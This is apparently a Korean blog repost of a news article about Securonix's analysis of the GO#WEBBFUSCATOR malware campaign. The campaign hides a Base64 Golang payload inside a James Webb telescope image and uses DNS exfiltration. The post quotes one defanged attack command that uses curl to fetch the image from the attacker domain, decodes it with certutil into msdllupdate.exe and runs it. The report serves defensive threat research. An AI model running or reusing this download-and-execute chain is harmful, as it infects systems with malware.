사이버 보안 회사인 Securonix의 위협 연구원은 최근 GO#WEBBFUSCATOR로 추적되는 지속적인 Golang 기반 공격 캠페인의 고유한 샘플을 식별했습니다. 이 새로운 복잡한 캠페인은 James Webb Space Telescope의 첫 번째 공개 이미지인 SMACS 0723과 난독화된 Golang 프로그래밍 언어 페이로드를 활용하여 대상 시스템을 악성코드로 감염시킵니다.
비전공자에게 Golang은 Windows, Mac 및 Linux를 대상으로 하는 여러 플랫폼에서 사용할 수 있기 때문에 사이버 범죄자들 사이에서 인기를 얻고 있는 프로그래밍 언어입니다. 또한 보안 소프트웨어에 대한 탐지율이 훨씬 낮고 리버스 엔지니어링 및 분석에 대한 내성이 향상되었습니다.
이 캠페인에서 맬웨어는 Microsoft Office 첨부 파일이 포함된 피싱 이메일을 통해 확산되고 있습니다. 여기에는 악성 템플릿 파일을 다운로드하는 문서의 메타데이터 내부에 숨겨진 외부 참조가 포함됩니다.
문서를 열면 악성 템플릿 파일("Geos-Rates.docx")이 다운로드되어 시스템에 저장됩니다. 템플릿 파일에는 사용자가 매크로를 활성화하면 이 공격에 대한 코드 실행의 첫 번째 단계를 시작하는 VB 스크립트가 포함되어 있습니다.
악성 VBA 매크로 코드는 매크로가 활성화되면 자동으로 실행되도록 설정됩니다. 기존에 포함된 매크로와 마찬가지로 템플릿에는 Auto_Open, AutoOpen 및 AutoExec 기능이 포함되어 있습니다.
스크립트가 실행되면 원격 리소스("xmlschemeformat[.]com")에서 JPG 이미지 "OxB36F8GEEC634[.]jpg"를 다운로드하고 certutil.exe를 사용하여 실행 파일("msdllupdate.exe")로 디코딩한 다음 실행합니다.
전문가들은 이 이미지에 2022년 7월 NASA에서 발표한 Webb Telescope의 SMACS 0723 사진이 포함되어 있으며 Base64 코드 앞에 있음을 발견했습니다.
cmd.exe /c cd c:\users\test\appdata\local & curl hxxp://www[.]xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634 jpg msdllupdate.exe 및 msdllupdate.exe
“이미지 파일이 상당히 흥미롭습니다. 아래 이미지와 같이 표준 .jpg 이미지로 실행됩니다. 그러나 텍스트 편집기로 조사하면 상황이 흥미로워집니다.”라고 전문가들이 발표한 분석 내용을 읽습니다.
“이미지에 포함된 인증서로 위장한 악성 Base64 코드가 포함되어 있습니다. 발행 당시 이 특정 파일은 VirusTotal에 따르면 모든 바이러스 백신 공급업체에서 탐지되지 않았습니다.”암호가 해독되면 Base64로 인코딩된 페이로드가 "msdllupdate.exe"라는 Windows 64비트 실행 파일(1.7MB)에 저장됩니다. 바이너리 msdllupdate.exe는 실행 AV를 회피하고 분석을 어렵게 만들기 위해 여러 난독화 기술을 사용합니다.
이진 인코딩된 문자열은 ROT25를 사용하여 추가로 난독화되며 Go 프로그래밍 언어를 사용하여 컴파일되고 Gobfuscation이라는 카운터 포렌식을 지원하는 최신 기술을 사용하여 난독화됩니다.
Golang 어셈블리는 XOR을 사용하여 0x20 바이트 오프셋을 사용하여 인코딩하여 분석가로부터 숨깁니다. 또한 어셈블리는 대소문자 변경을 사용하여 보안 도구에서 AV 서명 감지를 우회하는 데 도움을 줍니다.
일단 실행되면 맬웨어는 고유한 DNS 연결을 만듭니다. 전문가들은 바이너리 파일이 대상 C2 DNS 서버에 고유한 DNS 쿼리를 전송하여 DNS 데이터 유출 기술을 활용하고 있다고 판단했습니다.
“이 기술은 하위 도메인으로 설정된 DNS 쿼리에 추가된 암호화된 문자열을 전송하여 작동합니다. 우리는 DNSCAT2 와 같은 DNS 유출 도구에서 유사한 동작을 관찰 했습니다.”라고 보고서가 계속됩니다.
“암호화된 메시지는 C2 서버에서 읽혀지고 암호화되지 않아 원래 내용이 드러납니다. 이 관행은 명령 및 제어를 위한 암호화된 채널을 설정하거나 민감한 데이터를 추출하는 데 사용할 수 있습니다.”라고 덧붙였습니다.
“GO#WEBBFUSCATOR의 경우 공격자가 제어하는 이름 서버에 대한 `nslookup` 요청을 사용하여 `TXT-DNS` 요청을 사용하여 C2 서버와의 통신이 구현됩니다. 모든 정보는 Base64를 사용하여 인코딩됩니다.”연구원들은 이 캠페인에 사용된 C2 도메인이 최근 2022년 5월 29일에 최신 도메인으로 등록되었음을 주목합니다.
Securonix는 MITRE ATT&CK 기술과 함께 침해 지표(IoC)를 공유했습니다.
“전반적으로 전체 공격 체인에서 GO#WEBBFUSCATOR로 관찰된 TTP는 매우 흥미롭습니다. 합법적인 이미지를 사용하여 Certutil로 Golang 바이너리를 빌드하는 것은 우리의 경험이나 일반적이지 않으며 우리가 면밀히 추적하고 있는 일입니다. 바이너리의 원래 작성자가 사소한 카운터 포렌식 및 안티 EDR 탐지 방법론을 염두에 두고 페이로드를 설계한 것이 분명합니다.”라고 보고서는 결론지었습니다.
일본에서 가장 인기있는 데이트 앱(소개팅 앱) TOP11 추천
일본에서의 연애 상대를 찾기 위해 오른쪽이나 왼쪽으로 스와이프할 수 있는 11가지 데이트 앱을 조사해 보았습니다. 당신은 이곳의 데이트 장면이 놀랍고 새로운 흥분으로 가득 차기를 희망하
99bugs.tistory.com
해커로부터 돈과 비밀번호를 보호하기 위해, 지금 즉시 제거해야 할 안드로이드 앱 리스트
안드로이드 사용자를 조심하세요! Google은 최근 기기에서 사용자의 은행 정보를 훔치는 악성 앱 17개를 Play 스토어에서 삭제했습니다. 보안 연구 회사인 Trend Micro의 보고서에 따르면 이러한 멀웨
99bugs.tistory.com
*훌륭한 참조 원본 글 링크: https://www.techworm.net/2022/09/hide-malware-james-webb-telescope-images.html
'인생그것은약속위반 > 관심' 카테고리의 다른 글
| USB 프린터 동작하지 않을 때 해결방법 (Microsoft 윈도우 10 KB5014666 업데이트로 이후) (1) | 2022.09.10 |
|---|---|
| 핸드폰 잃어버렸을때 빨리 찾을 수 있도록 조치하는 방법 (0) | 2022.09.03 |
| 미국 대학생들이 가장 일하고 싶어하는 회사 순위 (비지니스, 컴퓨터 공학, 일반 공학, 인문학) (0) | 2022.08.28 |
댓글